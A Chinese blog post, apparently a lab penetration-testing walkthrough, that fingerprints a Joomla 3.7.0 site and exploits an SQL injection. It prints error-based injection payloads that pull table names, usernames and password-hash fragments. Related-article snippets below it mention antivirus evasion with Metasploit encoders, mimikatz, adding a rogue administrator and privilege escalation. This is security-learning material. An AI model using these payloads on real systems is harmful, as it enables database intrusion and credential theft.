简单渗透测试流程学习一

最新推荐文章于 2024-05-06 21:05:46 发布
最新推荐文章于 2024-05-06 21:05:46 发布
阅读量517 收藏
点赞数
分类专栏: 安全 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/126789361
版权

一.信息收集

打开靶场的第一步就是信息收集,看网站的端口,系统,语言,中间件,指纹(cms),服务,等等。

打开御剑识别网站指纹为joomla

 漏洞库搜索漏洞

下载Joomla源码解压vs搜索查看版本

 根据vs版本路径访问到xml文件找到版本3.7.0

 根据版本再去搜索相关漏洞

 

 根据找到的sql注入 漏洞,输入测试有限制

 

 bp抓包重放修改传参方法利用脏数据绕过

 查询表名

/(0x23,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()limit 0,1)),1)

 利用burp添加正则爆破模块爆破出表名

 

 爆破表名

(0x23,concat(0x7e,(select username from #__users limit 0,1)),1)

 密码显示长度不同需要截取字符串

(0x23,concat(0x7e,(select substr(password,1,30)from #_users limit 0,1),0x7e),1)

                                                     —————————————— 最不愿见到的…所谓的恋人吧?

夜yesec
关注
专栏目录
渗透测试流程与内网渗透测试实战
悦分享
07-15 7309
关于免杀,我使用的全部是msf的编码自免杀,64位使用的是x64/zutto_dekiru,32位使用的是x86/shikata_ga_nai,360都没有拦截。虽然靶机中有360,但是我直接上传的mimikatz也没有被杀,所以我有些怀疑是360的版本比较低,除了web服务器上传的第一个payload,其它都进行了编码处理,而第一个也确实没有执行成功,这说明360至少对第一个payload是拦截了的。
Metasploit6.0系列教程 -- 渗透Joomla网站
weixin_41489908的博客
10-19 2381
一、使用Metasploit对Joomal进行侦察 1、探测版本信息 选择joomla_version辅助模块,设置端口号及IP地址,run运行 use auxiliary/scanner/http/joomla_versionset rhosts 192.168.1.111set rport 8080run 2、页面枚举 选择Joomla_pages辅助模块,设置端口号及IP地址,run运行 use auxiliary/scanner/http/joomla_pagesset rhos
Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)
qq_45722813的博客
12-07 3046
Vulnhub靶场渗透测试DC-3 靶机下载地址:https://www.five86.com/dc-3.html 攻击机为kali2021,IP地址:192.168.172.131 将靶机导入到VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用nmap进行存活主机发现来获取靶机IP地址,命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP,可能是靶机网络设置问题,参考文章:https://editor.csdn.net/md/?artic
joomla渗透测试(脏牛提权)
a3320315的博客
05-15 1063
本来是个域渗透,不过环境有问题,就当作web题在做了 解题过程 这是一个joomla cms 我们先扫一下目录 连接mysql 得到MySQL的账号和密码 然后创建新的管理员 INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2','d2064
Joomla!网站扫描工具joomscan
weixin_34362875的博客
07-27 600
2019独角兽企业重金招聘Python工程师标准>>> ...
【CyberSecurityLearning 72】DC系列之DC-3渗透测试(Joomla
_Co1a
04-24 959
目录 DC-3靶机渗透测试 一、实验环境 二、渗透过程演示 1、信息搜集 2、SQL注入 3、登录后台 4、反弹shell 5、提权 总结: DC-3靶机渗透测试 DC-3也是一个黑盒测试,我们所能知道的只有它的MAC地址,我们可以根据它的MAC地址来确定IP地址 一、实验环境 实验环境: kali2021:192.168.3.155/24(桥接到vmnet0) 靶机环境DC-3(桥接到vmnet0,MAC地址:00:0C:29:2C:47:A4) ...
【vulnhub】---DC-3靶机
qq_43168364的博客
08-22 689
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-3 靶机(192.168.15.151) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:namp -sn 102.168.15.0/24 或者用netdiscover, 命令: netdiscover -i eth0 -r 192.168.15.0/24 或者用, arp-scan -l 端口扫描 命令: masscan --ra
靶机渗透测试实战(一)——熟悉渗透测试流程简单测试
热门推荐
橘子女侠
05-09 1万+
本篇文章不注重于渗透测试,而在于将之前学习过的方法加以熟悉; 1. 实验环境 靶机:CentOS 6.7,IP地址为:192.168.37.137 攻击机:Kali,IP地址为:192.168.37.131 运行环境:VMware 2. 实验步骤 信息收集 (1)查询攻击机Kali的IP地址; (2)识别存活的主机,发现攻击的目标 (注:二、三、四层发现的目的都是识别...
2024年渗透测试流程-全(仅供学习,知识分享)_渗透测试教程(1),2024年最新还在等机会
最新发布
2401_84563080的博客
05-06 1117
openssl心脏出血  https://paper.seebug.org/437/  http://www.anquan.us/static/drops/papers-1381.html  https://www.freebuf.com/sectool/33191.html445/ smb。ladp注入  http://www.4hou.com/technology/9090.html  https://www.freebuf.com/articles/web/149059.html443/ ssl。
渗透测试及流程
qq_34657922的博客
01-12 3367
手动渗透测试是由人类完成的测试。在此类测试中,机器的脆弱性和风险由专家工程师进行测试。通常,测试工程师执行以下方法 -数据收集- 数据收集在测试中起着关键作用。可以手动收集数据,也可以使用在线免费提供的工具服务(如网页源代码分析技术等)。这些工具有助于收集表名、数据库版本、数据库、软件、硬件甚至不同第三方插件等信息漏洞评估- 收集数据后,它可以帮助测试人员识别安全漏洞并采取相应的预防措施。实际利用- 这是专家测试人员用来对目标系统发起攻击的典型方法,同样可以降低攻击风险。报告准备。
渗透测试:完整渗透流程(当拿到一个IP)
weixin_54626591的博客
01-11 401
完整渗透流程(当拿到一个IP)
【工具使用】--- JoomScan工具简单使用
qq_43168364的博客
01-02 2735
1.简介 漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。该工具基于Perl开发,能够轻松无缝地对各种Joomla项目进行漏洞扫描,其轻量化和模块化的架构能够保证扫描过程中不会留下过多的痕迹。它不仅能够检测已知漏洞,而且还能够检测到很多错误配置漏洞和管理权限漏洞等等。还能够以HTML或文本格式导出扫描报告。 2.作用 自动化 版本枚举 漏洞枚举(基于版本) 组件枚举 组件漏洞枚举 防火墙检测 文本或HTML格式导出数据 查找常见日
Joomla未授权访问漏洞|CVE-2023-23752复现及修复
szgyunyun的博客
03-16 2662
Joomla 4.0.0 至 4.2.7 版本中的 ApiRouter.php#parseApiRoute 在处理用户的 Get 请求时未对请求参数有效过滤,导致攻击者可向 Joomla 服务端点发送包含 public=true 参数的请求(如:/api/index.php/v1/config/application?本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
第三次靶场渗透测试
z1moq的博客
11-25 5581
打开网页发现是一个博客页面,使用 Wappalyzer 插件查看当前页面的信息 使用了名为 Joomla 的CMS,后端语言为PHP,使用 ping 命令发现 TTL 为 64 判断为 linux 系统 查看其端口: 发现CMS版本
查看网站服务器版本,查看网站为TLS或SSL及其版本
weixin_29415667的博客
08-04 3159
如果网站公开访问如果网站是公开访问的话,我会通过SSL Labs Server Test运行它,因为这会给你整个网站的评级。在结果中有一个名为“配置”的部分,它显示了您的站点支持哪些协议和密码。如果网站是内部TestSSLServer是SSL实验室服务器测试的一部分,但如果下载可执行文件,然后它可以在本地运行,并适用于内部网站。TestSSLServer.exe [ options ] serve...
joomla如何去除版本版权信息
lllljz的专栏
04-25 2072
关于版本如何去掉底部版权信息也是比较纠结的,Google了好几下“如何去掉底部版 权信息”都没有搞定,原来自1.5版之后有些文件发生了变化,具体修改底部版权信息方法如下: 打开 /language/zh-CN/zh-CN.mod_footer.ini,在大约第 10 和 11 行,修改以下代码: 程序代码: FOOTER_LINE1=Copyright?? %date% Open
Joomla 漏洞总结
星落的博客
04-17 8824
CVE-2015-8562 反序列化漏洞 影响版本 Joomla 3.4.5 CVE-2017-8917 SQL注入漏洞 影响版本 Joomla 3.7.0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值